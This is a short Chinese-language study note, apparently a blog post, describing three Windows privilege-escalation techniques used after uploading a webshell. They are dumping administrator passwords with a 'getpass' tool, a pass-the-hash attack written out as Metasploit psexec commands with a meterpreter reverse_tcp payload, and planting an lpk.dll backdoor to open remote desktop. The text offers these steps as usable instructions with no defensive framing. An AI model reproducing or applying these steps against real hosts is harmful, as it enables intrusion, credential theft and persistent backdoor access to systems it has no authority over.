今天又学了几个提权的方法。

   1.getpass提权,去网上下载getpass工具,拿到网站的webshell后把这个工具上传上去,然后调用cmd来执行这个程序,管理员的账号和密码就会显示出来,很强大的一款工具,但是主机如果是安装的盗版系统,这个工具有时候就会失效。

 

2.hash传递***,这个***就需要用到有名的工具metasploit了,这个工具有windows和linux两个版本,可以去官网上下载。步骤如下:

启动msf msfconsole

  1. use exploit/windows/smb/psexec 用到hash传递***的模块

  2. show options 查看选项配置信息

 3.set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷

  4.set LHOST 本机地址

  5.set RHOST 目标地址

  6.set SMBUser adminstriator

  7.set SMBPass 目标机hash

  8exploit

这里还需要用到一个获取目标及管理员hash值得工具,去网上下载,上传到目标主机中,用cmd运行就可以得到hash值,这样就ok了。


3.

相当于钓鱼,需要管理员配合。

条件:3389远程桌面开启 触发lpk后门

触发条件:当前目录存在lpk.dllexe程序,exe程序被运行,即触发后门

通过工具生成lpk.dll再通过webshell上传到管理员常用的exe程序目录下,等待管理员触发执行。

工具 tools lpk sethc 用这个工具需要先通过webshell上传一个开3389的程序,生成的文件名字必须叫lpk不能叫别的。

触发后在通过远程桌面链接就可以了(这个方法我看了小迪的两套视频,他都没有试成功,我也试了几次也没有成功,真不知道是怎么回事。)